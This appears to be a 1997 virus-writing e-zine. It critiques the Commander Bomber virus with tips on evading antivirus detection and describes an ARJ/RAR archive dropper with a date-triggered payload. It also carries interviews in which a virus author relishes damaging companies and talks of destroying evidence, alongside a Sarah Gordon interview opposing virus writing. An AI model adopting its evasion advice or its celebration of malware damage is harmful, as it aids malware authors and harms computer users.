In my humble opinion, COMMANDER BOMBER has two main weak points. The first weak point is the garbage generation. Invalid opcodes are not very good in virus code, everyone should avoid them. Otherwise, there is ABSOLUTELY no change to enter the "In the wild list". The second weak point of this virus is the lack of encryption or poly engine. It could be a very heavy to defeat virus, if the Dark Aveger combined Mte polymorphism and the COMMANDER BOMBER midfile infection. But viruses of the later years used such a combination and this leads to very successful One_Half virus by Vyvojar. Sources are included in this issue. But, as not everyone has the necessary abilities, *-Zine is proud to present you the dizzasembly of this famous virus. Enjoy it.

Download attached files here

Resources used to write this article: brain own archive old issues of Virus Bulletin Cicatrix's VDAT 1.8, which is quit good IMHO interview with Dark Avenger by Sara Gordon 1 pizza from my favourite pizzeria 2 bottles of beer 1 pack of chips

Author is not resposible for the bugs in the article. Moreover author in not responsible at all. Especially 4 Sara G. : What a fuck was the joke with anorak ?

This article is (c) 1997 by the *-Zine. All it's use in whatever form is prohibited without explicit written permission of the *-Zine stuff members. Eventual violation of this restriction will be subject to prosecution. All the legal costs of the *-Zine stuff 'll be payed by the prosecuded.

This is just little article to keep you informed. The big world of bussines is ruled just by one golden rule. This rule is very simple. Big fishes use to eat smaller ones ! Only in some exceptional cases can small fish eat bigger one. The latest victim of this rule has well known name, especially in the virus underground. Because i wanna tell you its name. Read my lips .... TBAV, Thunderbyte Antivirus, produced by ESSaV B.V., a Netherland based company is no longer independent ! As stated by TBAV officials, TBAV "decided to become a part of NORMAN Group". In plain text Norman bought up the TBAV technology and research team. This fact means not only the change of product name to Norman Thunderbyte Virus Control, but also probably new, and more agressive advertising for the product.

And this advertising makes me laugh. Just for ilustration, some quotations from Norman Data Defense System materials. ... Norman Thunderbyte Virus Control never become obsolete. [but they provide updates every two months ] ... Norman Thunderbyte Virus Control is always one step ahead of the virus writing community [ I think, this 'll be joke of the year, or am I not right ? :)))) ] ... Norman Thunderbyte Virus Control is one of the few virus scanners able to understand OLE2 format ... This means full detection capability of Macroviruses, even encrypted ones ! [ Just check out Slovak_Dictator Marcovirus on other place in this issue to get the corrected opinion :))) ] ... cleaning utility, which enables all users to quickly and effective remove all macroviruses. [ I want to see it, dudes :) ]

Historia est magistra viteae. In the past, we've shitload of tricks, how to piss TBAV, how to deactivate its resident driver etc ... In the past, they always were (and always 'll be ) viruses, which forced AVers to less or more change their products. TBAV was no exception. And they should be one step ahead ? Stop kidding ! We will see...

And here is almost complette Intel opcode table. We bring it to you as some kind of help for your attempts to code new, kick the ass poly engine. Editors

Download here! Hi dudez! Here I present to the community result of my work. Basically, this tables are based on opcodes.lst from Ralph's list. All I did is just their transcription to this form. As it took quit a long time, I hope you will use it and enjoy it. MGL

Just a marginal notice from 1999 position - the table i prepared in 1997 has unfortunately some minor bugs. Some other ppl took over the table and didn't notice it exactly as i didn't .... So is the life ... :)))))

Hi guys. I decided to update Quark's ARJ Dropper for RAR dropping. I think what archive infection have feature at every OS, so i want to include ZIP and LHA dropping to nex relase of *-Zine. What this code does and what no.

At first it check if is today some day fo August. On this "some" day it launches my payload. Else it goes to infection. At second it find first ARJ for infection. If it find some then it try to infect it. if archive is infected now it is looking for next one ARJ. If is doesnot find any ARJ for infection ti try infect RAR files. RAR file can't be MULTIVOLUME ( at next relase it can be.) , can't be LOCKED and in archive can't be present AUTENTYCITY informations. RAR infection is verry simply. Go to eof write header, write yourself and infection is done. Download code and exampled here

So I wish you many happy days and connection reset only by beer and never by peer. Blesk.

My greetings to :
all co-authors of this zine, #v, Qark, Dalmatin101 Ilo Pedro >>> >>> >>> >>> >>> >>> see ya at next relase I will be back soon Thank for ARJDrop in VLAD I miss you. Thanx for keys from LAB. Parchante ozvi se !!!!

PS: Do you know how call worst muttation of AIDS [eic]. I think what Gates [geits] and W95 PS2: To view you must have math-coprocesor.

[ The suff above is original Blesk's one as we received it. English is lousy but Blesky is improving every day...]

If you are puritan or do not like four letter words, you are pleased in your own interes to skip this article. It may cointain examples of bad language and lewdness etc ... Editor

As i bought in my favourite book store book titled "Modern computer viruses - basics, prevention, protection" i was really pleased. But this feeling didn't last more than few hours. As i red each further page,i became such a strange feeling. As i have substantial part of the book red already elsewhere. This czech book, titled "Moderni pocitacove viry ....", written by Josef Jaluvka, is divided in two parts. First part is the usual crap like what virus is and what it does, defines type of viruses and etc... Second part, in my humble opinion the substantial, is the crutial part of this book. It is quit detailed guide to write viruses. But ... I mentioned before my strange feeling bout this book. And this second part has brought the proves.

About 50 % of this book is ripped from various zines, mostly from VLAD's, 40hexes, NuKe Journals, but also from serious hardcopy publications which are copyright protected. But this author, son of the bitch gives not only one fucking credit for stoling the text, schemes and sources. Asshole ! Cock sucking motherfucker ! Fucking lamer ! DIE !!!!!!!!! As i told it to some people, which work was stolen, they were really angry. Just one example for all ...

One former member of vx underground, now retired, was really ungry . I was asked not to publish his name and his opinion. But just to ilustrate his pleasure, i put here anonymous some of his opinionz. ... and im not surprised...these books are all shit anyway all yours tutes 're included. But that dick didn't put one single credit in that book

... no shit! what a jerk

... goddamn fucker. good thing those tutes aren't so great anyway :) On some other place in the book that 'author' is really without any shame. He just ripped series of articles, originally published in elite hardcopy slovak magazine, PC Revue. Even the schemes are the same ...

I guess, if the true author of that part in book 'll read this (and I know he 'll because he is an AV sucker working for some company producingr avir iCî), he 'll prosecute that lamer Jaluvka for copyright violation. I hope he 'll request at least 1,000,000 for that violation. So, i wish you to lost that case, Mr. Jaluvka .... [ To the reputable unnamed dude .... I can contact you to really kick the ass layer. Just mail me to our e-mail adress at hotmail. ]

Just to ilustrate some of really valuable information in the book, imagine this. On page 202, chapter 5.1 "Pasivni obrana" - Passive protection, Jaluvka describes how the authorz 're trying make it heavier to AVerz. One of these counter - measures should be code optimalization. And he gives some excellent xsamplez in table.

In book two, chapter one, Jaluvka describes some toolz, necessary to fight (and write) computer viruses. He describez Techhelp! 4.0, some deep-inside-DOS books,sourcer, AFD pro, Turbo Debugger, Qaid analyser and ... that's all folk :) He has no idea, that some Ralph Brown's Interupt list exist (every good FTP site or BBS has it), that some Soft-Ice debugger is on the nearest warez site, and ofcos, that there is a shitload of virus zines. But, maybe, this omision is just purpous ?

Although the book cointains couple of useless crap and some really screwing mistakes, it could be used as a quit good tute to code viruses. But I think, that is not the thingy the author wanted. But people, if you are publishing some stuff, do not forget to include that funny C in brackets. Just by putting (C)opyright 1997 by your_name_here you should be protected. And of cos, in case of copyright violation you can prosecute the bastard.

This article is (C)opyright, (c)opyleft 1997 by The Ziggy Zag and was written just and only for the bombastic issue #1 of the *-zine.

An Immortal Riot/Genesis orignal (c) 1997 The Unforgiven. May freely be quoted!
Index of this article:(click sensitive) Introduction. Things to do before physics. Red Hot Chili Faces The early Insane Reality - Insanity or Reality? Current life & general adult hints Satisfying one's ego AV-Interview IRL-Papers The horror! Gimme more cheese please Eugene K Side-effects the conversation way Scene-Zines Greets Credits Goodbye's and cya somewhere.. somehow. Quatations & Poetry Future


Mgl (Mengele.(P)hD?) told me SVL was about to release a newsletter, and asked me kindly to contribute a little something to it. He had nothing in mind what I do for them (I said no to source-code contributions since I didn't feel like decreasing the code quality) so I just had think about something myself. Well, this is the result, perhaps nothing really worth wasting any time with, you decide. My nature is to please anyone whenever I can so don't held me responsible for you losing your faith in humanity, society, god or whatever. If someone want me to write just something, surely I'll do it. If he would've asked if I could give him a blow-job, I would though have turned down the request.

This contribution from me is styled VLAD-AF article.2_5 because I find the scene way too serious and that article a good read (Yay. I wrote it ;)). This mean this can be seen as a early valentine issue from myself included in the SVL-e-zine #1. Or it might just bee seen as wasted bytes dedicated to wasted souls. Notice that the rest of Immortal Riot/Genesis has nothing to do with this stuff at all. I assume personal contributions is allowed to other zines, specially since MGL contributed to IRG#8. Also important to

mention is that none of this stuff (I guess) would make it into an IRG-sinze due to our new technical styled magazines which I hope you all did enjoy!

So... This is from all of me, to all of you - whoever you are. My dog surely will like it, but an updated interview with him won't follow! Parden me. Deadly serious ironic/sacrasm-ish reading and happy '97! - The Unf rgiven

Things to do before physics

Before I continue writing I'd like to take the opportunity to mention a few things that perhaps could easy my burden. 1). Time to spill out the beans... But who wants to eat them anyways? I'm as for the moment writing & doing reserch on an article about "why viruses are written, for who they're aimed, why viruswriter's keep on doing them, personal motivation for viruswriting, why you once started and what you find facinating (or at least interesting) with them." So, I'd like *every* writer of computer-viruses to email me and write a little something about the above mentioned questions. If you feel like adding a few things that you find interesting go ahead, let your mind go wild!

You can be anonymous if you like but don't forget to mention that! This article will hopefully (most likely) be included in our next issue of Insane Reality - IRG#9. My email adressess are: Notice also that those system's is rather instable, but if you read (II) you know I also can be reeched on that adress ( (II) is 9 lines below this line ). 2). Part II - Where you rather not want your daughter to be late at nights... On there are some IR & IRG files located (ir.html is the file located on that adress btw, if that is for any use). It's not an offical IRG page but all of IRG.SE know the homepage operator and he kindly borrowed us some HD space. Every swedish IRG member can also be reeched on that adress - just email and he will kindly CC (that is abbreviation for _carbo-copy_ if my memory isn't totally phucked) them to the correct person. Notice though that the official IRG-page still is located on:

3). I'm just an inspiration for birth-control... My submission (other word for contribution Quantum told me ;)) to VLAD-AF (Vlad-April Fool's Edition) called "IR#8" contained a little challenge - namely to crack "File Encryptor". Well, Sepultura found out the 12 byte long key which was "tuir@MAR.C0m" (w/o the quote-marks).

The april fool joke from me was that secret.txt never did gave out my real information nor it did contain the reasons why my handle was The Unforgiven. For those who wonder.. keep on wondering! I doubt that it has something to do with suicide though, which some brave writer believed.

Also notice that Quantum never did hack (since it doesn't exist), and ripped "IR8" from there, it was a submission to their zine from me, pretty much like this is ;). He wrote that information at the end of the article. Well as I figured you never did read the entire faked Insane Reality #8 ;) and believed him. April sucka. I hope you reech the end of this one :).

Red Hot Chili Faces

Hmm, I don't quite know where to start, but I would like to comment a few personal things at this entry. There are a few good reasons why I didn't contribute much to IRG#8 and beside being very busy with life, university, my gf and the general irl-stuff I re-read the IR-zines and felt terrible embarrased for them and felt like writing no more. For example, I started to write an article called "What good sideeffects viruswriting can result in", but gave it up. It became too personal, abstract and complex. And beside this, it turned huge. A short summary of my results might still be included here or elsewhere since it's a rather interesting topic. So stay tuned.

The early Insane Reality - Insanity or Reality?

Well, both really. They're insane, yet real. I was red-phucked-up in my face and my heart went ape while reading some articles, specially those which included stuff written about girls and politics. And yea.. those viruses too. *Sigh*.

Also worth to mention, I wasn't too pride too see some text-strings included in my viruses or in programs included as hex-script in some zines. (One example is "" in IR#7 (reality.010 among with basicly, the entire adventure of porno)). For those who've been harassed, I'm sorry.

Hrm, about some articles... Really, who're interested in reading about some Maria, some Ellinor, some

Anette or some other girl? Who're really interested in reading about a confused teenager opinions about something that he cannot express properly in english? Who really bother about a person who ramble on and on and on (like now) without giving any information, just pure junk? A real rnd_garbage generator, or so? However, for those who really are interested in my and my life, junk stuff, etc. paradoxal enough I won't let you down, but this time write about something that I can be proud of and still will be proud of when I read it in let's say 3 years. However, it's still junk though. Do I never just give up?

Current life & general hints, advises and shit

Current life is cool. I study and spend most of my spare time with my close friends or with my gf (name won't be mentioned) who I've been togheter with about half a year (so far).

Hints in life is have plenty of sex. If you consider yourself too busy or "too of something else.. " change opinions. Nothing is as relaxing as it. It's though not good to became a "sex-addict", since most addictive things is bad for you, sex being the exception as long you have semi-control over it (having sex with yourself w/masturbating 5 times a day isn't the way to go). Not only is sex great but to really care about someone rocks. Don't let your life miss this.

If you smoke just give it up. It smells bad and it won't do any good for you. Smoking at parties is alright but it doesn't really impress on most ladies. Socially smoking is great, but socially being decently drunk is also a killer, so.... it isn't perhaps the best way to deal with things'n'shit anyways.

Alcohol. ch3-ch2-oh. This rocks. Don't be sober too damn often. Home made whine can rock (and beside it's cheap, it's a good hobby...).

Astronomy. Really interesting and is a great thing to discuss, philosophy and crapp on about after a few beers. Only a few things can be described as complex or simply as this.

Driving-license. Freedom costs. But damnit, it's worth it.

Cooking. Everyone likes to eat, be sure you can do magic in the kitchen. Don't rely upon girls to do this for you. Not being dependant on other persons is essential in life. I only wish I could describe my situation as "not being.. ". Bah, isn't money to key to everything? (yes, that might as well include the r@@t of evil, too)

One Half. A really good virus, lack bugs and contain a really cruel original payload. This issue includes the original source code.

Suede - Coming Up. A really cool album, maybe the best album any U.K band ever produced. Sgt.Pepper from Beatles might just be up there.

Ford Fairlaine. "Eih.. I fucked him!". Great fucking movie if you ask me. Up there along with Eddie Murphy's RAW.

Hotmail. Well, any anonymous mail-system is great if you feel like giving your teacher some soft of feedback (critism can be kind of sensitive, just trust me..). Http:// A cool rerouter can be found on ( is one of those catchy phrases..).

Burger King. Just so much better than fucking McDonald's. Not a good place to work on I guess but for lunch (not date-dinner though!), it's more than OK.

AVP anti-virus. Love the demo-section. The scanning/cleaning capabilities is also really impressive. Along with its code-analyser. If only it would ran a little bit faster on my machine.

Java, html and high level languages. Well, assembler is cool, but I sincerly doubt it will get you any wealthy. Internet and its applications is what brings you money. Developing things fast is what companies want you to do.

Irc. If used properly (i.e. not sitting there wastening all your spare time) irc can be as good as a scrink depending on which people you have a conversation with.

Money. I have stated that greed is your worst enemy, so watch out. Money tend to change things, beware so it won't mess you up. Might just solve your problems better than booze. Booze solve things by its nature ;), problems is not included though.

Drugs. If you're afraid to face the reality, change your situation, don't flee from it with drugs, computers,

irc and shit like that. If you can control your use, it will sooner or later turn into abuse and you should give it up asap.

Clifton Classic clothes. A sleep-over, black jeans (or ordinary Docker's if you prefer that) combined with Sweet Georgia Brown hair pomade looks nothing but great.

Insane Reality. For whoever find low-level assembly programming and virus-related things interested this is zine to get ;). Hehe, just had to mention this.

love. If you don't find someone else to love that loves you back, be sure to love yourself. It's great to have a massive, yet humble ego.

Studies. Can be quite hard. Compared to life and work it's though not as hard as you once believed.

Isaac Asimov. Truely a smart writer. The books about the "Foundation" and "robots" are good and cleverly written. Something useful to waste your time with and might just get you interested in astronomy.

Acqua Di Gio Giorgio Armani. Going around stinking bloody Farenheit or some other highly common eau de toilette or after shave always manages to upset someone. Be original and expensive in your choice of scent.

Coffey. Keep your awake during studies, during hacking, during coding. Sleeping is such a waste of time, really.

Oxygen. Can't really without it, however some early viruses early in the world's timeline could.

Overrated things
Hitchhiker's guide to Galaxy. Isn't all that great, really. Has a few points, but not worth 900 pages.

Windows/95. Everyone know this OS sucks, howcome everyone is using it?

Swedish chicks. They aren't all that neat. The majority is just plain trash most of the rest is average. A minority is something to have in the long run. Of course, one doesn't realise this on a 1-2 week long vacation.

Sleeping. Everyone likes this and it's essential it's said. But, really, it is like wastening a 1/3 of your life with.

Opinions. Who will listen to you anyways? Who need goddamn opinions? Why are you even reading mine?

Technology. Science should be fiction/not truth, dreams/not reality and so on.

Neuromancer. Another book not worthy its reputation. William Gibson just ain't no good author.

Action movies. Do I have to comment this?

Satisfying one's ego

Here's an interview I filled out for Richard Loearker's book. It will be an anti-virus reserach book and I do encourage every viruswriter to erase my answers, fill in your answers yourself and send it to If you want to add more questions to it, that is fine, too. I know this is lame, egoistic to include an interview with yourself, but this ain't no popularity contest. Do me your worst. Personally, everything I've ever written is horrible this piece - I see as the exception (i.e. the interview) but that might just change if I re-read it in a year. Well.. most things tend to change. What is your handle? My handle is The Unforgiven.

How did you get your handle? I found the handle on one of Metallica's albums and decided to take it. I liked the song and the alias did somewhat fit my person. I don't know exactly why, but metal-music has in a way or two always inspired viruswriters so it seemed to be a natural handle to occupy. How old/young are you? (Approx. If you won't want to be specific) I'm 21 years old. Would you dare to give me your first real name? (Do if you want to, don't if you don't want to) Sure, that would be no problem ;-). How would you describe yourself? I prefer not to since your readers would probably think of me as some sort of bragger. Ah well, I think I'm a pretty ordinary young adult who is a part-time enjoyer of life. As for the moment I'm studying on Chalmers University of Technology located in Gothenburg (Sweden), and will hopefully be for quite some time. I've worked with various things during the previous year, among many things computer-security. Although I liked my job I decided to get back to school after a moment of clarity. Socially I'm really not very complicated. I live a healthy social life with really good friends and with my girlfriend who's always there for me. I believe I'm very spoild concerning this kind of things. How do your friends and people around see you like? (BE HONEST! ;-) I am not a mindreader, but I do however believe that most people have little or no trouble with my humble person. Of course, there is always exceptions and honestly I don't deserve to be liked by everyone. Hopefully all that is in the past, but who knows? Cruelness is one mean habit to kick. It just won't walk away all that easy. I always try to care for persons who care for me and I'm always interested in getting to know new persons. Maybe are those the reasons why people accept me for who I am. Since when did you get involved with virus writing and how did you became interested in the first place? I became interested in viruswriting somewhere back in 1993. Me and a friend started Immortal Riot - mainly a viruswriting group, and I had to start to learn assembly. Since when did you get involved in a virus authoring group? When I started the group, of course. What made you decide to join this group? I didn't join Immortal Riot, I created it. I don't though know exactly why I formed yet another viruswriting group, but it seemed like a great fun and I tried it out. How did this group get its name? I don't have a clue. It did sound cool.

What are the reasons for you writing viruses? I'm totally clueless! There aren't many good reasons really, but viruses facinated me and I wanted to learn more about them. The best way to learn more about viruses is to write them and so I did. What is the main purpose of the group? To write new good undetectable viruses, supply the masses with virus related information and knowledge for whoever it may concern. One of our goals in the beginning was to learn the shit ourself and teach echother the knowledge achieved. Ah well, mainly the purpose of a viruswriting group is individual. I doubt we had any specific purpose really, mainly it was just a fun thing to waste your time with. Approximately, how many viruses have you written? I couldn't count all updates, new versions and so forth. The viruses released in the wild and which has infected computers around the globe might be around 30. Which viruses were a real challenge for you? (Masterpiece?) When I finally got the knowledge to write some good virus I got unmotivated and grew bored with it. Mainly I wrote viruses whenever I felt like tormenting some computer geeks or when I was really upset about something. Nowadays, I've calmed down or maybe I just got better things to do with my life? Who knows, I might give it another shot, sometime. Have you written any virus toolkit or add-on? No, I don't think so. Why have you written this toolkit or add-on? .. What kind of reactions did that program get? .. What's your attitude towards antivirus researchers and why? I've no problem with most of the guys "on the other side" and most of them do deserve some respect. Some of them have though some serious attitude problems with viruswriters, but honestly I couldn't care less about them. Some persons have problems with everything and this just ain't my burden. Give me some opinions about and his product. If possible, motivate. ... Frans Veldman (Thunderbyte Scan) Frans Veldman is a really good low-level programmer and TBAV is a technical excellent product. ... Dr. Alan Solomon (Dr. Solomons Antivirus Toolkit) I believe Dr.Solly has a huge identity crise or just heaps of problems with his very own person. I

havn't looked closely into his product, but he ain't programming on it himself so it can be good. ... Fridrik Skulason (F-Prot) I like Frisk a lot! His product is excellent and I recomment F-Prot for everyone who are looking for an anti-virus program. Fridrik himself is a very nice person and he's also a lot like "us" but older. He once stated in an email to me saying "viruswriters are a lot like me 15 years ago,", I like him for being honest. Also notice the comma in the quote before the quotation mark ends. Well, let's just say I'm trying to act as a reporter. ... Eugene Kaspersky (AVP) AVP is a good product, too. I don't know very much about Eugene but I want to believe he's nice. ... others you would like to give your opinion about? (ME? Naaahh) Nah, I wouldn't waste my time to write anything about John Mcafee since everyone knows his product (Scan) sucks bigtime and he's a fake. What is the best line of defence against computerviruses and how would you implement it? To remove all floppy and harddrives and never copy anything? :-). Honestly I don't quite know. No system is 100% safe against virus attacks. Personally I like resident monitors and recommend other persons to use them if they're afraid to get a virus (I believe the TSR monitor called F-Prot Gatekeeper is a good choice). Some sort of scanning software is also good to execute once in a while.. Would you like to work for an antivirus company as researcher/troubleshooter? Why or why not? I would have no problems with that. Would be quite ironic and I couldn't say I wouldn't like it before I had tried it out. If someone turns to you for help when his computer has a virus, would you help him? Please motivate why or why not. Sure I would. That would perhaps increase my knowledge about these little things and on the same time I would get the other persons respect. I've done this several times during the past years. Would you ask money for your help? Of course not. I dislike greed. If it turns out to be a virus you have written, what would you do? This too has happend :-). I gave out all technical details about the virus (trust me, they got really impressed) and wrote a cleaner for it. Voila! Respect earned in a cheap way! Would you still ask money for your help? I wouldn't in the first case, so... No, I wouldn't. But I would offer them the source code (claimed

disasm :)) for further investigations. What would your initial response be if you see a newspaper that describes your virus wreaking havoc in: A government agency? First I would first laugh my underpants off, but then I would be a little bit worried about it. My handle/real identity is pretty known afterall so this could get me busted. I think I would destroy all evidence so they couldn't prove shits. A hospital? That depends. I wouldn't like to see someone getting hurt physically by a virus of mine but if it just had infected some of their computers or trashed some easy to recover data I'd have no worries with it. Of course this is bad publicity, but I can live with that. A large company? Yummie! I like all daily newspaper reports concerning companies getting hit or (prefered) wiped out by a virus of mine. I would be happy a day or two then I would forget all about it. A small company? I couldn't care to discriminate between large or small company. Of course I would like this too. What would your initial response be if this company went broke due to your virus? I would silently say "Woops, better not trust computers, geek." and get paranoid about the consequenses. Surely, they would want someone hanged. What would your initial response be if someone dies in the hospital due to your virus? Shit! Really I wouldn't like this to happen. I'm not a weirdo. I would probably think about this a lot and after quite some time come to the conclusion that it was all an accident and not, - not even indirectly - my fault. Then I would try to forget all about it and blame the dead vegetable on someone else. What would your initial response be if the government loses all police arrest records due to your virus? Voila! This I would indeed like. But then again, they wouldn't report this and just restore the records from backup's. If they had no backup I would thing twice about the effects this kind of incident may bring and get really paranoid. How is the law in your country concerning computer viruses and what is your opinion about it. The law is a complete mess. I can understand if deliberate spreading of computer viruses is considered a crime in some countries, but writing? No way! And how easy is it to prove that I deliberate did spread a virus? Most laws about viruswriting has a large amounts of flaws. Surely, with a good lawyer you will get away with it. Sweden hasn't for the moment any specific law which forbids this.

Have you ever been arrested for doing illegal things with computer (viruses, phreaking, hacking)? No. I have never been arrested for anything. Aren't I too legal? :-). Has this arrest altered your view of these activities, and, if so, please describe the stage you went through. .. Would or do you write antivirus software? No I wouldn't. I couldn't make money outta it anyways and just writing one for fun is a waste with my ever decreasing amount of spare time. I have though written cleaners against viruses reported in the wild. It's for no use to have a product detecting 10.000 viruses which aren't a real treat. If so, what kind of software has your main interest? TSR-blockers, scanners & cleaners. What would you like to say to antivirus persons if you have the chance? "Hello". Which is a good first word to start a conversation with. What would you like to say to new virus writers that are getting in the scene? It's not really worth it and maybe it's only a waste of time for everyone. In the end nothing what you are doing now counts. Find something better to do and get on with your life without the scene. It won't do shit for you. What are you planning to do in the future with the knowledge you have now about viruses? Frankly said I don't quite know. I had use for the knowledge gained from the scene and from friends in the scene. However I would like to believe that you have use for anything you ever learn, so it's not really such a big deal afterall. I'm as for the moment writing an article about what good side-effects viruswriting may have (on personal basis), but as for anything concerning the future, you just don't know. Do you think that writing viruses was a good descision for you to take? Please motivate why Yes or No. I wouldn't know. I could impossible know what would or could have happend if I didn't. I only know my situation as for now, but sure I like my current life. PS: This interview will be put in a dutch antivirus book.

AV interview

Here comes an interview with Sarah Gordon (all you surely know her). She can be reached at on Here it follows anyways, enjoy! First of all, i would like you to give me a personal character presentation about yourself with your own words. then, secondly, (be honest), i would you to write how you think other people around you, see you as. Personally, i try just to be honest, thorough, compassionate, and loving person. i try to not make judgements or draw conclusions without thinking them through, and i try to be fair. (note: i did not say i dont make judgements or draw conclusions. i said i try to think them thru and be fair. i see nothing wrong with a person saying 'i like or dont like this or that and here is why', or 'this or that is wrong, here is why'. i am not very good 'game player', and usually just say what i think. since sometimes what i think may change, this can be a problem :) my priorities in my personal life are relationship to God, to my husband (i was recently married as you may know), to my children (who are grown), to my friends, and then to my work. at least, in theory this is the case. how i see myself?..hmm, well, i try to adhere to what i think is important, but i do not always succeed. how others see me, well, you would have to ask them :). but i think sometimes some people have preconceived ideas, or want someone to fit a certain mold they are comfortable they put me there. when they do actually take the time to know me, they often find out they were wrong. i think also this happens with many people, not just me. (it could be they find out they were right :) yet others, usually those who are professionally competent and secure, don't have these problems -they see the bigger picture and have no need to create artificial life-model of another person :) (no pun intended). i am told that i have no sense of humour and that i see things 'differently', whether or not this is a benefit is an exercise left to the reader. about your articles, what gives you motivation to write them? well, i write different kinds of articles, and the motivation is different for different ones, at different times. i write about something if it interests me, and if i think i may have some idea someone else may not have thought of. or if i see something written i dont agree with. i have written several for money, but they are usually technical security articles, nothing to do with viruses or virus writers, or any of that. sometimes it is nice to deal with 'non-people' issues, there is a lot less room for 'controversy' :) and/or the virus-community with your write-ups? (if yes, motivate what.. ). sure, some have changed. i mean, now they are talking to each other instead of just name calling. i think i played some role in that. well, i know i played some role in that. but my 'role' was just to initiate change, as some form of catylst. don't you know, usually the catalyst gets burned the most :) there is now more examination of facts, instead of hype and hysteria, related to virus writers. i know i

played some role in that. all in all this examination is good, for both sides of the discussion. i think virus writers are now thinking and talking more about what they are doing and want to do, and realising the impacts of releasing their creations. im told i have had some role in that. but i dont know. i hope i did. but it could be natural sequence of events. maybe i just recorded/documented it. maybe i made some change by doing that...i don't know. i know personally i have had some impact in the overall dynamic, but how much and how to measure is difficult. many times now im quoted about what ive learned by just talking to people and analysing facts about how viruses really spread. hopefully this has some effect on getting the media to focus on real problems. but virus writers and things related to them are just small portion of my work. ive done more in product testing, certification and network security. however, it is the 'virus writer' work which seems to grab some attention. something you have written/worked about that has been misunderstood? sure, this is always the case with everyone isnt it? havent you? :) in particular, i remember when phrack wrote some story which they later said 'we're sorry, we didnt check this out thoroughly' about my trying to shut down some bbs. its true i was in a room when someone suggested that some bbs should be closed, but if i remember correctly, i suggested this is not a very good idea... then, there was that ugly silliness the virus writer kohntark made up. i never did figure out why he did that, but he seemed to have some stuff works, just like it is cool to know about other computer actions and who can argue with you? not me. but there is no 'magic' or technological 'excellence' in this stuff. its not 'new science'. its not any way to get a good job. what it can be is some very costly pasttime. there can be a big price to pay -- you can really hurt someone with the viruses, because you can not guarantee that you can control the viruses. people will say you cant *really* hurt anyone, but they are wrong. so please stop and think what you are doing. if you are the kind of guy who wants to hurt them, then you deserve what you may get if you do it. [how many words was that?] about your article "the generic viruswriter", the four persons you selected for the four groups, who were they? (if you can't give this out, don't, but motivate why.. ). sorry but that is confidential to them. why? i told them it will be confidential unless they tell me otherwise when i asked for people to respond to the survey. which virus-related article is your personal favorite? (why is that..). general systems theoretical model for av protection (if you mean my own). it is favorite because it allowed me to work in new area. or do you mean in general? what, concerning virus-related stuff have you regretted in your life?

i regret that i did not realise the personal dynamics of my relationship with the virus writer formerly known as dark avenger, and that i was sometimes too concerned with my personal life to give attention to him when he needed it. but it was really wearing me out, and i actually got physically ill from spending too much time with all the work. i did not realise the impact this all would have on him, or on me. it took alot of my time and attention for several years. i have written a lot about how we dont realise the impact of our actions on others, since the computers can tend to desensitize us. unfortunately, i was not 'immune' to this . do you prefer tea or coffee in the morning? grape kool-aid (dont you attend defcon? :) your favorite dish? prawn crackers, any hot chinese dish with chicken. what're your hobbies? (umm.. one hobby.. many hobbies??). hobbies? i think you need spare time to have those.. i used to sail and did at one time train and ride my own horse, but i had to give him away when i could not afford to keep him. i also dont have my sunfish sailboat anymore. i have recently tried to do some oil painting, but lost interest in it. i guess i dont really have any hobbies. do you? who did you vote for in the president election - 96? i did not vote. do you think the "virus-infections-problems" will die out and fade away with the OSes getting more common, dos losing ground, etc? and in how long time if yes.. i think this depends on how you define 'problems' :) you sell f-prot professional, what other av-products would you recommend for the average user? the 'best' product for any job depends on the needs of the user as well as the product. any product which is wildlist compliant is a good 'starting place' for the user. from there, he will need to factor in his individual needs. about f-prot pro & not-registrated, what are the differences? i have did a comparison for the Command web can see the differences there! (can you tell i'm getting tired? :) how does your typical monday-friday day look like? (are you satisfied with your current life?). get up. drink kool-aid. (ok, coffee:). log-on while drinking coffee. answer mail. answer questions about viruses :). answer more questions about viruses :). (answer this mail). look at viruses :). look at more viruses :). try to spend some time researching new topics. answer more questions about and look

at more viruses (usually macro viruses). am i satisfied? no. are you? what plans (irl/computer) do you have for the future? irl, i want to buy a house and a dog :) have a garden and volunteer some time someplace meaningful. for computer, i am thinking maybe ill write some new software, maybe automate some tests which take a lot of my time now, and probably design a new CSecurity model. do you prefer a dog or a cat? (not for dinner.. pet :)). hey, how did you guess? i have a cat but he lives with my friend. i could not bring him to florida. he loved his house too much. so now i dont have any pet. but hope to have both. well ..since i wrote this, i have bought another dog, he is not yet named, and is still at the pet store ..but i will be bringing him home soon. [since i wrote this (yet another edit :)), the dog from the pet store got sick. so we got yet another dog. our third. this one we named 'lucky'. i hope he is :)] about viruswriting groups, a lot of us has faded out and died recently, anything you want to say to them or to the one's that still remains? i'd be interested to talk to anyone who wants to talk seriously about viruses. do you consider viruswriting to be a perverted hobby? never did. waste of time. probably unethical from a formalised ethical modeling point of view (if you're Kantian :). can be illegal. but perverted? thats funny :) . have you seen the Internet lately? lets keep things in perspective. i work hard to help users avoid problems from viruses, and feel people need to take active steps to help stop virus distribution. im against indiscriminate virus distribution, and think that as a society we should not overtly or tacitly condone it. but there are far worse problems facing our society. this is not to say viruses are 'no problem'. they sure are! but in the 'big picture' there are far worse problems facing computer users and society in general than the viruses we are seeing today. it is the viruses which i have chosen to fight, and i wont stop fighting against them because it is wrong to make software which hurts people or which has the potential to hurt people. computers should be used for helping people, used for good ethical purposes. now, can you and i talk about why you write viruses and distribute them in your magazine? because i think it is wrong. you can argue that what people decide to do with them is their own business and not your fault, but actually if you didnt give them the viruses, you wouldnt have a role in their using them for bad. as it stands now, you are partly responsible for what they do with what they do with your creation. why not create something which uses the computer to help people, something they can chose to use and thank you for instead?

IRL papers

I've seen a lot of write-up's concerning computer-viruses lately but since they're all in swedish and me being a bad translator I'm sorry I didn't translate them all for you. If you know some swedish though the page to be on is: (or .html dunno). One article called "Virus Buster" is located on (or .html dunno) which's featuring a picture of Klas (S&S Sweden) Sch”ldstr”m "which makes life hard for those who got the idea to create and distribute computer viruses" (He's defintitly geeky looking, check for yourself!).

Some quote's from that articles (published in Computer Sweden #77, Friday the 6 of Dec, 1996) follow though (scene-person related, go bitch on him or so..) here. "Last spring, the virus Boza came, that was the first virus for Win/95. But it sucked. It can only infect files in the same directory from where it was executed from and it fails doing it sometimes. It was though a media-hype (or PR-trick) from the virus-authors to be first with a 32-bits-virus". (Now, he also diss the hare virus claiming it's only halts the computer and that he consider macroviruses the real danger..).

